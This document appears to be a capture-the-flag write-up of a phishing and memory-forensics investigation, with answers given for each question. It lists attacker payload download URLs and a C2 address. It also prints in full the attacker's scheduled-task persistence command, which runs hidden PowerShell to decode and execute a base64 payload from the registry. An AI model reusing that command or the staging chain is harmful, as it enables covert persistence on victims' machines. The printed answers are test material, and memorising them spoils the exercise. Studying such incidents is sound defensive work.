Boogeyman 2

After having a severe attack from the Boogeyman, Quick Logistics LLC improved its security defences. However, the Boogeyman returns with new and improved tactics, techniques and procedures.

In this room, you will be tasked to analyse the new tactics, techniques, and procedures (TTPs) of the threat group named Boogeyman.

Prerequisites

This room may require the combined knowledge gained from the SOC L1 Path. We recommend going through the following rooms before attempting this challenge.

• Phishing Analysis Fundamentals

• Phishing Analysis Tools

• Boogeyman 1

• Volatility

Artefacts

For the investigation, you will be provided with the following artefacts:

• Copy of the phishing email.

• Memory dump of the victim's workstation.

You may find these files in the /home/ubuntu/Desktop/Artefacts directory.

Tools

The provided VM contains the following tools at your disposal:

• Volatility - an open-source framework for extracting digital artefacts from volatile memory (RAM) samples.

vol -f memorydump.raw <plugin>
vol -f memorydump.raw -h

Note: Volatility may take a few minutes to parse the memory dump and run the plugin. For plugin reference, check the Volatility 3 documentation.

• Olevba - a tool for analysing and extracting VBA macros from Microsoft Office documents. This tool is also a part of the Oletools suite.

olevba document.doc

Spear Phishing Human Resources

The Boogeyman is back!

Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.

The security team was able to flag some suspicious commands executed on the workstation of Maxine, which prompted the investigation. Given this, you are tasked to analyse and assess the impact of the compromise.

1) What email was used to send the phishing email?

Answer: westaylor23@outlook.com

2) What is the email of the victim employee?

3) What is the name of the attached malicious document?

Answer: Resume_WesleyTaylor.doc

4) What is the MD5 hash of the malicious attachment?

Answer: 52c4384a0b9e248b95804352ebec6c5b

5) What URL is used to download the stage 2 payload based on the document's macro?

I used olevba to extract the information into the Resume_WesleyTaylor.doc document.

Answer: https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png

6) What is the name of the process that executed the newly downloaded stage 2 payload?

Answer: wscript.exe

7) What is the full file path of the malicious stage 2 payload?

Answer: C:\ProgramData\update.js

8) What is the PID of the process that executed the stage 2 payload?

Let’s use the raw file, which is the memory dump of the victim machine. I used windows.psscan to retrieve the processes.

Answer: 4260

9) What is the parent PID of the process that executed the stage 2 payload?

vol -f WKSTN-2961.raw windows.pstree

Answer: 1124

10) What URL is used to download the malicious binary executed by the stage 2 payload?

Answer: https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe

11) What is the PID of the malicious process used to establish the C2 connection?

vol -f WKSTN-2961.raw windows.pstree

Answer: 6216

12) What is the full file path of the malicious process used to establish the C2 connection?

I use the following command to view the original command of the executable file, showing its full file path and execution details.

vol -f WKSTN-2961.raw windows.cmdline | grep 6216

Answer: C:\Windows\Tasks\updater.exe

13) What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)

vol -f WKSTN-2961.raw windows.netscan | grep  updater.exe

Answer: 128.199.95.189:8080

13) What is the full file path of the malicious email attachment based on the memory dump?

vol -f WKSTN-2961.raw windows.cmdline | grep doc

Answer: C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc

14) The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?

strings WKSTN-2961.raw | grep schtasks

Answer: schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"'